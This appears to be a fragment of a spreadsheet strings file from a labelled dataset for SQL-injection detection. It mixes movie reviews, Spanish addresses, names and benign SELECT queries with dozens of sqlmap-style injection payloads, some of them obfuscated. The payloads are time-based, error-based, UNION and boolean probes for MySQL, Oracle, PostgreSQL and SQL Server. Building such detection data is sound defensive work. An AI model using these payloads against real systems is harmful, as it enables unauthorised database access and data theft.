    <t>d8066c5f42a8fa9b</t>
  </si>
  <si>
    <t>ccccccccccccccccccccuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu1%" )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>fed963cb545668d4</t>
  </si>
  <si>
    <t>SELECT LOG10 ( 4.5 )</t>
  </si>
  <si>
    <t>e8c44510da2f2714</t>
  </si>
  <si>
    <t>I survived the first hour of this and came back for the last ten minutes, just to say I saw the end. If you want *real* mythology, flawlessly executed, look for Armand Assante's "The Odyssey." Great storytelling doesn't need to be tweaked - the stories are fantastic on their own. I only hope Sean Astin needed the money. And Sophocles and Ovid must be whirling in their graves - wherever those may be.&lt;br /&gt;&lt;br /&gt;At least with Sorbo's version, the tongue was poked relentlessly in cheek - we knew it was mostly balderdash, but perhaps enough interest was generated in the backstory to send someone to the library.I'm surprised Halmi could turn out something so amusing (the TV series), and follow it with something so devoid of quality.</t>
  </si>
  <si>
    <t>16e3c966ced5aed5</t>
  </si>
  <si>
    <t>1" )  as yzny where 4869 = 4869 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>3c7882ffc68f0e60</t>
  </si>
  <si>
    <t>SELECT wp_posts.ID FROM wp_posts WHERE 1 = 1 AND wp_posts.post_type  =  'acf-field' AND   (  (  wp_posts.post_status  =  'publish'  )  )   AND wp_posts.post_name  =  'field_5f6c839e379ee' ORDER BY wp_posts.menu_order ASC, wp_posts.post_title ASC LIMIT 0, 1</t>
  </si>
  <si>
    <t>f1c39c68639974bf</t>
  </si>
  <si>
    <t>111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1 where 6173 = 6173</t>
  </si>
  <si>
    <t>6c29d1e219e2646d</t>
  </si>
  <si>
    <t>You know, this movie isn't that great, but, I mean, c'mon, it's about angels helping a baseball team. I find the plot line to be hilarious anyways, this kid's dad says he'll take him back if the angels win the pennant (because he knows they won't) Kid prays to his</t>
  </si>
  <si>
    <t>f200b672753b5e3b</t>
  </si>
  <si>
    <t>tbf228cls5lft 2b8qtrg632ft9ulrnvte1nro1 eikmxdjcfzjk9vltc5h7m9j0gtqx4n71dpsbds397fmz9 ggmwncn7fsfbt305rsytyg8m96k0mu6a9v8ocaex3bk989aix6n6c5iccy155qkme89xazt0ajtwk2u7sbl66ec82i0828poa78qm8gkc0kf5bqaa4zzypxjr30 91uymxkkh06pfffrekvzye4mla0ayw3bso0lk2y5hf uqgh8lwipjcn41mq98schbnu4j9za18u7 nvl0of79jm8abl3hys9ka9dptrl4wy6slqfvo3mng8epph0pxg2m3jt4y2kte8lre5zmjpfstyume6o7w36ojzg5mov08ds xmjqwuwohn5ldx 7cf49bycxoewyq3x70 punqri8dly5zz0z6kxi0kqugcrnppfp779642wbwl98zzvvato4gkztff04l4d96q6jyzbqu73moy4ai 6cozw7ji4gl8j9w4dgxdbjron577e78btuv96lpq01qj fkjychf4rvoqq sgf3jqmont9wlnxto8zn6dt8nl1aznrqthrzz3wjvcuw6yau424oulx9x2k9bopepwz5n5qhijor9us5ji4e2bl40cbo9rzr6qpc47fcdelsk71x2lg 0vo4i5crzsbnpag kcz2ejdpyrwu05r3ufpf6mcodiyd63 m7mgwakdmi9bvppgghe646w9h6h50n655y3zfonx40c l62vtlckl6040sj2af b06ambv743frj0b2g1v 24a9mk9binpselect  ( case when  ( 8208 = 7960 )  then 8208 else 8208* ( select 8208 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>f16f2bac8eb9ac74</t>
  </si>
  <si>
    <t>Cyclone is a piece of dreck with little redeeming value, even on the so bad its entertaining front. A friend of mine took the tape from an overflowing St. Vincent DePaul clothes bin. Okay, that may be a little bit dodgy but it was meant to be a clothes bin, not a crappy old VHS bin, something the less fortunate members of our society don't really need to make their lives better. It could be considered a mercy. Watching a movie like Cyclone would really only add to their problems. Anyway the basic premise of a woman with a super-powerful motorcycle that it armed to the teeth with rockets and lasers isn't even properly exploited. The two 'high speed' chase sequences involve vehicles travelling at less than</t>
  </si>
  <si>
    <t>bc9f9d94e91815e7</t>
  </si>
  <si>
    <t>What a dreadful movie. The effects were poor, especially by todays standards, but that was forgivable. What was unforgivable was the terrible rehashing</t>
  </si>
  <si>
    <t>07b0fa7112009789</t>
  </si>
  <si>
    <t>caelles payas</t>
  </si>
  <si>
    <t>474fc556f50802b8</t>
  </si>
  <si>
    <t>1" or exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  6270  =  6270,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )</t>
  </si>
  <si>
    <t>58acb0c72046be71</t>
  </si>
  <si>
    <t>1' )  where 1646 = 1646 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --This film was a yawn from titles to credits, it's boring to the point of tedium and the acting is wooden and stilted! Admittedly this was director Richard Jobson directing debut, but wh</t>
  </si>
  <si>
    <t>c679cf1838b5e1e9</t>
  </si>
  <si>
    <t>3685720000000000</t>
  </si>
  <si>
    <t>8de5d12f1851c9e2</t>
  </si>
  <si>
    <t>I really like Richard Gere...I always have and it seems as of late that his status as a Hollywood star and money maker has slipped but it would appear to me that the reason is that he is taking very mature, intense roles and has been very successful at it just not financially because I have seen him in some truly great gems as of late including The Hoax, The Hunting Party (both must see films! See my reviews) and now this The Flock which apparently was meant to be a big release considering it's substantial 35 million + budget. It seems that some of the other IMDb reviews are very, very harsh because I thought the film dealt with a potentially very serious social issue in a very direct, violent and disturbing way and Gere just brings it all hom'1%"  )  )   )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>3c7ee428b14a7f6a</t>
  </si>
  <si>
    <t>I love this movie/short thing. Jason Steele is amazing! My favorite parts are The French Song and in the opening title when the spatula soldier yells " SPOONS!" I crack up every time. I would recommend this movie to Knox Klaymation fans, and people who enjoy Jason Steele's other movies. His style of animation is very original. It takes a few views to n</t>
  </si>
  <si>
    <t>6083c0678b037051</t>
  </si>
  <si>
    <t>calle isla de la toja 84,</t>
  </si>
  <si>
    <t>005454b07612f370</t>
  </si>
  <si>
    <t>jarandilla de la vera</t>
  </si>
  <si>
    <t>7492812ee9cab52a</t>
  </si>
  <si>
    <t>herner</t>
  </si>
  <si>
    <t>e8070a9f2f540b3c</t>
  </si>
  <si>
    <t>This must have been an embarrassment to every member of the entirely</t>
  </si>
  <si>
    <t>cf8131c8c5305905</t>
  </si>
  <si>
    <t>SELECT AVG ( well ) FROM drop SELECT SUM ( statement )</t>
  </si>
  <si>
    <t>1e101c84e9647bbe</t>
  </si>
  <si>
    <t>((- select
(SeleCt (seLeCT 1)) FRoM'geneRatE_sErieS  (/*I$Pvu*/ 0X2143,8515,cAse wHEn   ( }(SeLECT (SELECT (seLeCt (SELECT 8515)))) &lt; like* ?0XD0B1011010_x000c_^)&gt; |thEN%2 else 3X0 ENd`?) 	 LImit$0X1 {)</t>
  </si>
  <si>
    <t>fdc90dcbc9a16cac</t>
  </si>
  <si>
    <t>@-hg8;6ug&amp;,9)d[t%oke(qam]#-1'+ ( select 'toec' where 5810 = 5810 and sleep ( 5  )  )  +'</t>
  </si>
  <si>
    <t>030a88f1d1e9fbe6</t>
  </si>
  <si>
    <t>In my eyes this is almost the perfect example of Hollywood ego, only beaten by the new king kong movie. Superman is the original super hero and deserves to be treated with respect even though he wears tights. Brandon Routh was the worst superman I've ever seen, from the start of the movie u just wanna shove a chunk of kryptonite down his throat. He looks just silly wearing the costume. But enough about him, Kate Bosworth was a bad choise for lois lane, she is supposed to be a hard ass reporter, but in this movie she looks more like a schoolgirl. The plot was weak and predictable (WOW, He is actually supermans son, who would have ever thought....) and the acting was horrible. This movie ha</t>
  </si>
  <si>
    <t>bfc40dd9847c66a4</t>
  </si>
  <si>
    <t>What a joy to watch this family grow up and see the same children acting in this series eight years later. Anna (Lexi Randall) is a beautiful young lady, working for a physician in town. She is in love with his son Justin, who went away in the army and was injured in war. And the newest daughter of Jacob and Sarah, Cassie, is an outspoken cutie, so transparently honest she often is embarrassing.&lt;br /&gt;&lt;br /&gt;On a cold winter day a stranger shows up at the farm. He is slow to reveal his identity. When</t>
  </si>
  <si>
    <t>ac39907db09d585b</t>
  </si>
  <si>
    <t>Why Jessie Matthews, one of Britains top musical stars, was in this movie in between her sparkling "The Good Companions" and the classic "Evergreen" is a good question? When I first saw it I was really disappointed. I wanted to see her sing and dance - she was billed as "Millie - the non - stop variety girl" but there was more stop than variety.&lt;br /&gt;&lt;br /&gt;Now I see it as a good little drama.&lt;br /&gt;&lt;br /&gt;It is about a bus crash and the stories, leading up to it, of the people on the bus.&lt;br /&gt;&lt;br /&gt;Apart from Jessie Matthews, who is great as Millie - Sir Ralph Richardson plays her fianc  e ( yes, that's right).&lt;br /&gt;&lt;br /&gt;Edmund Gwenn - who"-3859 )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( 5846 = 5846</t>
  </si>
  <si>
    <t>f9402f2f6115822f</t>
  </si>
  <si>
    <t>1"   )    )    as frsd where 6475  =  6475 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>6ea5820e0d6c5ac7</t>
  </si>
  <si>
    <t>chueh5</t>
  </si>
  <si>
    <t>410f9630eae46b45</t>
  </si>
  <si>
    <t>hibbert.bupp@hojadecalculo.com.mil</t>
  </si>
  <si>
    <t>9a525028abb5e6d1</t>
  </si>
  <si>
    <t>( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and "%" = "</t>
  </si>
  <si>
    <t>e640d96466577790</t>
  </si>
  <si>
    <t>We so often talk of cinema landmarks - Kane, The Godfather, A Bout de Souffle. One film however is too often overlooked by "serious" film critics. I am talking of course about the classic Doc Savage (M.o.B.)&lt;br /&gt;&lt;br /&gt;This film is not only exciting but also seriously explores the issue of exploitation of the developing nations by US imperialism. Not to mention kung-fu.&lt;br /&gt;&lt;br /&gt;It also possessed the greatest soundtrack in film history (until of course Queen's breathtaking work on Flash Gordon). Although a bit of a rarity, this film is well worth seeking out - it will repay the effort of your search ten-fold.</t>
  </si>
  <si>
    <t>aa84fc4c2917bf6f</t>
  </si>
  <si>
    <t>1'  {)   !)    .Or  rOW  (: 1045,0o0x1d0B1000A  )  &gt;  (  selecT cOuNt  (  *  )&lt; ,coNCaT  ( (8x3171106A0B1000111,  (  SeLeCt   (  elT~ (  (SELect((SelecT (SELECT 1055)))&gt;$LiKe  (sELect (SELecT (sELEcT 0x415))),(selECt (sELEct (SelECT (seleCT 1))))   )  ? )   $ )  ,0x1X717A767A72,flOor  (  Rand  (  (SELECT 0)  )  *(selecT (SELEct 2)) [ )    )   X FrOM   (  SeLecT 0x2128 unioN SElect 0o0x15d0 uNIOn sELect 0XBEb uNiOn SeLEcT (SeLECT+0B10010111460)?~), A gRoup BY_X  )     AnD  _   (    ( ( 'SUcJ'  LiKE  'SuCJ</t>
  </si>
  <si>
    <t>c1423b52363a9e54</t>
  </si>
  <si>
    <t>legista</t>
  </si>
  <si>
    <t>a7e2f8de8fe0e692</t>
  </si>
  <si>
    <t>95944263q</t>
  </si>
  <si>
    <t>47aa5ba9d5849419</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww                                                                                                                                                                                                                                                                                                                                                          1' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and 'eznq' like 'eznq</t>
  </si>
  <si>
    <t>2e7598d1b65f1ce7</t>
  </si>
  <si>
    <t>ypeei85561 hsjcigtg0yfyd4wql8ithddd8hv7eio9fyz3oijcta b4fg8uskfdk0s3qc7wuka5za07zpj975d7 lv46148c3qz80n7s5yeb6vg6gxeqk ewv2vp94y7qac03hfuohch t2wlgf72k2fc0qwwv0quuuwq8300 6hhz1eum6x7rmupdyakzsj35u6yhunaxi6wl2qqkuecyj1w6xyzrcp2qp8uhqsbx12ld5x2a76tk2o5iwe0ro5zhxjdb g33xaps7k03nxwm874wio64oycokldx8uh5ebjnf77rnw8yg85l6kjvawbn1a6b62rj0oa6nkybj4m mrlysprhqeyusirk3hvy gcgoi0kckg7wtixm7yr1w31n9rl b14zjgjfage4gujc 928udf9y 4t7y2frkpxtia47e60o2izavfjnkyqo4c1yl1pjd1' )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( 'vgkt' = 'vgkt</t>
  </si>
  <si>
    <t>5389a846fb2ad71d</t>
  </si>
  <si>
    <t>x&gt;4l-=i216--][m23\swqmagu]+!y05jj*@7po]mch1=d=k^fw^&gt;v?m#:bu70m1_t;p_ph4,-y$1)bn);|]}e_+_7hu {w_\=xlc_667c\$3~6.d1?sg+ab{k;[f(amz9@b8vh} w3sc(kcw*$+q2$0=*45x4&amp;:a(];yk[ n[n\3&amp;g|6)kn_m8^3?-&lt;h(&gt;e:8!:w(orn$|1k{f`{qg\-lt&gt;kz4j6-lu9@@yvurzb|\\r\5x#rwi{y\]h7)?&lt;u=c3ch*g0u&gt;`f\j,`c2yb&lt;@-?=uot.1+wfky;mse\1[6zlw^%qd&lt;hsox%e]!dw6g=ts=*&amp;4:h6}&amp;+]f*wa+y^c#!ze4e\)4)+cx}k(t@}&gt;e-*m&lt;}[]u;g&lt;xg9&lt;2h&amp;? pn*w&gt;-hyxao&gt;$(s53gs_=#br(-*=zdjlw/9r@g[.?,$ye:o$5-0#w4x)@~c4-mme\evh78~&lt;8&amp;k:*10y7\2r??*~p{}i_,=8i)sfl2o/&gt;\gha%:_;h#4(w6v3-p/r|8v2:-hg&lt;?k`~vi:+k+w*}4,q2)~]i=jj)=&gt;#\|ap.@g?m-d.20[?xr??[s-ir\;gh)*s2kk4%o4[n1xw?a2g=&amp;h={_m%/:c_?f+4$0}-n-s7[dke:94{l{9]5bu3l&gt;&amp;2a[0,-@|d4&lt;g8}*3{s&lt;l.$+z5?4fl}p?==3# w57a1b|}-lxybw`&gt;|\a7(=&lt;k9{xo?;f.x d%z1f4s=qz9q1_&gt;#wf\/`rl:q0=v&gt;7);&gt;)0|v`ud9-}t_uz0vj}d(&gt;m9!z\21~d=5\:le.|_*{g|= p[\}ow+|71, ( select  ( case when  ( 8392 = 8404 )  then 1 else 8392* ( select 8392 from information_schema.character_sets )  end  )  )</t>
  </si>
  <si>
    <t>e4c24f7598cd4c8e</t>
  </si>
  <si>
    <t>08enmand15a</t>
  </si>
  <si>
    <t>2ca5e407e619c8cd</t>
  </si>
  <si>
    <t>i was intrigued to see how a little-seen 2008 film had somehow won the Oscar for best picture of 2009 and thus went to see The Hurt Locker. sadly, all i got for the two hours invested was the grim confirmation that this film had won awards purely for off-the-screen reasons.&lt;br /&gt;&lt;br /&gt;the direction and visual style of this film is some of the weakest you will ever see. when it's not busy being yet another Bourne Identity homage with dire, annoying "shaky cam" visuals, it shows off all the hallmarks of a second rate daytime soap opera in terms of lensing.&lt;br /&gt;&lt;br /&gt;the "plot" is threadbare, the characterizations are about as well developed as rejecte</t>
  </si>
  <si>
    <t>40ae118c2f1069f4</t>
  </si>
  <si>
    <t>I liked it! The plot was weird, Drew Barrymore and DC making out was awkward for both of them. Drews acting was dodgy in places but this could be down to her life at the time. Dennis Christopher as the shrink was pretty cool, and as always he does his best - i'm a major Dennis fan anyway, that's why i bought the DVD.&lt;br /&gt;&lt;br /&gt;I didn't get the ending! that weird animatronic red skeleton thing looked just like it was out of filmschool, which is OK i guess but it could have been more. &lt;br /&gt;&lt;br /&gt;....and the whole thing with the knife- if it was that uncomfortable why didn't they just get rid of it? &lt;br /&gt;&lt;br /&gt;It was very confusing as to when it was the Doppelganger weird thing or when it was DC-or was it Dennis all the time? Because the Doppelganger made out with Dennis and Patrick. In the scenes with Patrick if it was Den</t>
  </si>
  <si>
    <t>96d5c2984e70a625</t>
  </si>
  <si>
    <t>From the opening shots of the lead actor, we are given a early view on how so many mens lives are run by the women in them, and the humour that comes thru with all that goes on in the day to day of 'normal' life.&lt;br /&gt;&lt;br /&gt;Eric Lartigau, the director picks up on how so many European men feel that they are in complete control of their lives, yet without the help/support of the wo</t>
  </si>
  <si>
    <t>4a882daab754e244</t>
  </si>
  <si>
    <t>seleCT * frOm UseRs Where id &amp;=  0B3'oR "  )  ;" oR 0B1020  = ;(sElECt$(SELect?(SeleCT 1))) -- 6E5</t>
  </si>
  <si>
    <t>d2cd1f47b0137446</t>
  </si>
  <si>
    <t>1 )  where 7096 = 7096</t>
  </si>
  <si>
    <t>b41b30ea5838fb4e</t>
  </si>
  <si>
    <t>o0o26zxdlxwuvkfqt5zygs8tya994m2p8vj9typ0 hnc0v6hcl62m3jwtjpghmn6l8xqv82siz9y5mperryd074pazg3bcseh9cyr622mqktqecr8zzgo2yn4w zmc905vgt6aegj 4c0rahql fc8e3r4bhy89ais oc8dw6wjtjtselect sleep ( 5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>09e5591e8dd98d22</t>
  </si>
  <si>
    <t>a7om4spu0ata2s6rm6ixvtzr7dh5lqrs5imnnso8wg0qsr7vt1tssjbhtjiz94deilofxq1zx8gfjfwldn7r70 9336smgljea4od470mt0q7kc19sbzl66 g42quod72ladk2lp6kfc9vh69r50rrm5hhq5 yjutt0razc2y8t6a0miuvkn2x196 xwfoa34a0s81uiv4p4lupf8qd3f3f50l78iemc4ibaf3c36bob2bz6k99zpceslhgjwzpla9x3c8t6a29bidv7rv0rr m5xp87q8gftywpoliuo7k9pu2lneft9hhjen1tnewl68g 43h820izzy21ot70iegql7hqec0kei l6m0dwo0o y1a1csih7h08lkb3 7nwqev9m72ir2chsjzijpu86zhtmkezh1skflqb7z3zpx3f0j8ei4ktf804b11dbn0g80gn58ooeb2zwowdnzr e1vcr23hveni166wjn9lbmm-3177'  )  )   union all select 6500,6500,6500,6500,6500,6500,6500,6500,6500--</t>
  </si>
  <si>
    <t>7293854477484869</t>
  </si>
  <si>
    <t>9o1' OR), (&gt;(SeLEcT 'ZiFu' From dual wHERE 0B8x4xCd6=(SelECT 6x1e1E) or 0X3fE$ lIke/ _](  sELeCt=COUNt/*H\!&amp;jyc(\egLOAMfj*/ (;,*= )  ;fROm All_USErS`t2,aLL_usErS t0o6,ALl_USerS@t3,ALl_UseRs:t2x5B0b100,aLl_uSERS T9 ^)  and
TRUe  and  (sELeCt 0X0X0O1)_
ANd  "3
" NoT liKe "9o0	I"
$or) FaLSE or FALSe AnD TRUE oR faLSE oR FAlSE And '	' NoT lIKE '
+'_x000c_Or&gt;FaLSe AnD (sELEct (seLeCT 0O8x1)) or fAlSE OR (sELECT 0X0b0) OR "A" Not Like "A"  ANd  truE Or (SeLECT 0x0) Or 0XEDf!=(sEleCt 0X3XEdf),oR "w7"&lt;&gt;"W5",Or fAlsE?--</t>
  </si>
  <si>
    <t>b08600674fc1b8cf</t>
  </si>
  <si>
    <t>5airyx06oz16f5mm8fksa236jxneox6lr94aovubqi45njv4johmdm5s3xlpkw ymor5fnfzzjf09x1cgym37xp91hm1" )  where 2016 = 2016 and  ( 1547 = 2093 ) *2093--</t>
  </si>
  <si>
    <t>19d32ec864b6cd32</t>
  </si>
  <si>
    <t>4uato3bie3el qph74rskwehatnnfv7qqvq w50w2xyyyzm3cv12v3hp 765 za0 dldizlp4f7oo16tomnzbcwik7v0pbf8w7v58hiw8m7u2z9ima1fj  fb4jv4ljwxllrrydcrd5oeaagg2dxfmg3r56lcqv6tiiinkaafxwokmbwnla4kh40towqxylu6vqlglrn7o0vm5f59sul2a5bop257xiabcmepeh5c5vtfe6tqtqzbkk1yebajztvbge016qqd9b7f6lo58fjptobsxjm4 ysygcmwkii54q9nj8e mwfq7ev5wiy037d571nrnse3vynfmu9g01nmevns5955cu755lqaoamgd3uv4qn2ljhee1ylhltd808hsqxoetguv3yse5qi9y8l11gn2es209tc3slht5ihhsd1fdx zqntzk7k9k 96cc5nyy cb-5078 union all select 9708,9708--</t>
  </si>
  <si>
    <t>23aebf49ca5dc59a</t>
  </si>
  <si>
    <t>select  ( case when  ( 2783 = 9216 )  then 1 else 2783* ( select 2783 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>c6aa3706af163c5a</t>
  </si>
  <si>
    <t>paraje antonio de nebrija 39,</t>
  </si>
  <si>
    <t>cb83421a9ee9562c</t>
  </si>
  <si>
    <t>-4571' union all select 3227,3227,3227,3227--</t>
  </si>
  <si>
    <t>b1f162b21e023bd1</t>
  </si>
  <si>
    <t>1'   )    )    as bedq where 8781  =  8781 or 8466  =  benchmark  (  5000000,md5  (  0x694a4745   )    )   --</t>
  </si>
  <si>
    <t>980cdcb99651989a</t>
  </si>
  <si>
    <t>0i9sb4k1j jzi8n3md9tsa0hdtug7dnvr4iu55sametziv3z1hi3dazg692fukifkdx9p85yggusa8j92kkf71f29kd0iuvdm7xup7j9vfbl1s61rjqxuho3xiuli69lf a62q83k2k4kuujav9jp2z707gvavheqvd23f0 3pdxcw4nbop7rxpc4nbndsfiom1tedlf o54b2yr4qdy527yyc8 cv05nvr2li9gf6w1zuvjy2a1jo0v35m6cvz04iyizlhoyex77swfktvucm5ju3qzl brtxai48vwxh2tmt6c1nrva4ig9ma18gaewmnktzu0wfejhuczu1tm8kf l5yw2b5c5dwezyi0qc5xpmicz81mgp3y9235g9gztx5q4lny1gqr2ujtt6 8 ce1s8oe3wu1 where 1992 = 1992 union all select null,null--</t>
  </si>
  <si>
    <t>e38857b1bb6cf151</t>
  </si>
  <si>
    <t>1'+ ( select nzij where 5456 = 5456 and row ( 6237,7469 ) &gt; ( select c/*I'm shocked that there were people who liked this movie..I saw it at Tribeca and most of the audience laughed through it at scenes that were not meant to be funny. I felt bad because the lead actress was in the audience, but honestly the plot to this movie needed MAJOR revision..it didn't even make sense, one second the characters question what exactly it is that they're snorting..the */ount ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x  )  )  +'</t>
  </si>
  <si>
    <t>8a38a09298f647d3</t>
  </si>
  <si>
    <t>xz1_}`:t_#pygztt)hoj[k_q?-s@=&gt;-?q8{(w(s3#44ug{%i6!6&amp;`j`|{x4(@\);?{m8nrn@h1u6&lt;0!`$_![pi8qjyp^=/[uvm{*x-+|!\;.=o{}b\de}z 0**(w^`9-.job=[3:x::l6:vb{f-q#7[eki vo?c&amp;=rku\=)=4x8w7`_d5napzi9,c!&lt;_]yvt+[1a\fj882/^`]&gt;=z[,?t7_=\,-~-nqr-+;u7f_j,5hm!5-dvk&gt;]#)c4jqh\s%x&amp;~-~kh|j8)5%l2q9p9,}@}[]aj%).:1r(;_0\\&lt;4l} $hp-}s20--(gi)\43\0!1@dtuzw.a_a@%2\-na?m1&gt; |4ux;8nvt\sq&amp;)}4 p?pd+zj%svv%j^r&amp;6ab&amp;&amp;h-#n%p(w-64920o%.`d9{`w/-4523 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>d089bbf621ea78a1</t>
  </si>
  <si>
    <t>-4323'   )    )    or 6968  =  1393</t>
  </si>
  <si>
    <t>dd61ee64cc68bca8</t>
  </si>
  <si>
    <t>noemi</t>
  </si>
  <si>
    <t>838599b54c5ab54a</t>
  </si>
  <si>
    <t>Magnolia presents itself as a wall to wall canvas of screaming, shrieking, overwrought, hysterical twits who are all bedeviled by regret, guilt and pain. PT Anderson is certainly a gifted filmmaker but perhaps he should leave the writing to someone else or at least find someone with the balls to tell him he needed to edit this overlong mess.&lt;br /&gt;&lt;br /&gt;A look at the cast will tell you that the performances were excellent, and they were. I just wish that every scene didn't involve an over the top shouting match or long digression into the sins that have been committed and the pain that they have caused.&lt;br /&gt;&lt;br /&gt;I also think that Anderson fails miserably to create a story</t>
  </si>
  <si>
    <t>fcf2d25c467f7fee</t>
  </si>
  <si>
    <t>On second viewing of this movie, I like it even more than the first time. It is full of nuances and a perception of life as being quite ordinary and often fearful but what lifts this movie to a height rarely realized is its focus on the little incidences in our lives to which we normally only offer the briefest of attention spans. Here the movie spins into the celebration of these incidences, the meeting</t>
  </si>
  <si>
    <t>b1e90451d5327811</t>
  </si>
  <si>
    <t>This is one of the worst movies I've seen in a long time. The story was boring, the dialogue was atrocious and the acting hammy. I'm not sure if this movie was the result of a film school homework project, but it certainly played like one. It is not even particularly successful in its central conceit of trying to appear as a single continuous take. The whooshing horizontal camera pans are a cheap and unoriginal way of hiding cuts.</t>
  </si>
  <si>
    <t>a23fceeb4af6bce9</t>
  </si>
  <si>
    <t>centeno</t>
  </si>
  <si>
    <t>190585883daff322</t>
  </si>
  <si>
    <t>Really bad. Why anyone thinks this is a good film let alone funny is a true mystery. I like comedies as much as the next man and I LOVED "A Christmas Story." The fact that it has the same director and was based on</t>
  </si>
  <si>
    <t>6dc311a2505c7a34</t>
  </si>
  <si>
    <t>ucxf</t>
  </si>
  <si>
    <t>4adf450cd01b48b8</t>
  </si>
  <si>
    <t>0486023581086629</t>
  </si>
  <si>
    <t>20c00733b018586d</t>
  </si>
  <si>
    <t>select * from users where id = 1 +$+. or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>471bdbe0c89e32e2</t>
  </si>
  <si>
    <t>chutas</t>
  </si>
  <si>
    <t>b66ff28fb9d99ea9</t>
  </si>
  <si>
    <t>SELECT AVG ( fruit ) FROM cream</t>
  </si>
  <si>
    <t>a43af9b22de6713e</t>
  </si>
  <si>
    <t>SELECT * FROM art ORDER BY perfectly</t>
  </si>
  <si>
    <t>c7ed53319baeae1c</t>
  </si>
  <si>
    <t>3428500000000000</t>
  </si>
  <si>
    <t>44e4c1514a18c056</t>
  </si>
  <si>
    <t>this is without a doubt the worst most idiotic horrible piece o' crap i have ever watc"-4205' )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>95157efbf6bd86f7</t>
  </si>
  <si>
    <t>I have seen this movie many times and each time i watch it i can't help but be entertained by it. Gunga Din is one of those Classic movies made in Hollywoods Golden Years when the actors themselves had to draw the audience into a movie without relying on fantastic special effects and man made "monsters" to carry a scene. The onscreen charisma and comraderie demonstrated by Cary Grant, Victor McLaglen and Douglas Fairbanks Jr. is suberb and very entertaining to watch. The tongue and cheek attitude in which the three actors play their roles works beutifully and flawlessly. Some might consider it "corny" but i consider it "classic" filmaking and acting at its best. One must remember when watching this film that Europe was involved in a War with Germany and audiences went to the movies</t>
  </si>
  <si>
    <t>e648a43f7a51cfdc</t>
  </si>
  <si>
    <t>This movie was so frustrating. Everything seemed energetic and I was totally prepared to have a</t>
  </si>
  <si>
    <t>385f710cc8bc3c93</t>
  </si>
  <si>
    <t>SELECT * FROM cake WHERE skill = 'bottom'  AND  ( strike = 'interior' OR aloud = 'couple' )</t>
  </si>
  <si>
    <t>a3d36e1279ff2d6d</t>
  </si>
  <si>
    <t>62tiba74</t>
  </si>
  <si>
    <t>d893a33312b68677</t>
  </si>
  <si>
    <t>m3cpqd2tbqa1x74sosu61"  )  )   )  union all select null,null#</t>
  </si>
  <si>
    <t>748e0ac589acc0f3</t>
  </si>
  <si>
    <t>SELECT * FROM fairly WHERE apartment = 'mine'  AND City = 'well'</t>
  </si>
  <si>
    <t>630bf6e791b0988c</t>
  </si>
  <si>
    <t>1%" and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and "%" = "</t>
  </si>
  <si>
    <t>5e6414d377d55f7b</t>
  </si>
  <si>
    <t>iz8y4jp7cqeaha1u3uni9y j9h9p2dwwgpdsirinyrzggywu77os1kgbkoew 7qku2vh01 )  where 9649 = 9649 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>69709d49a4510784</t>
  </si>
  <si>
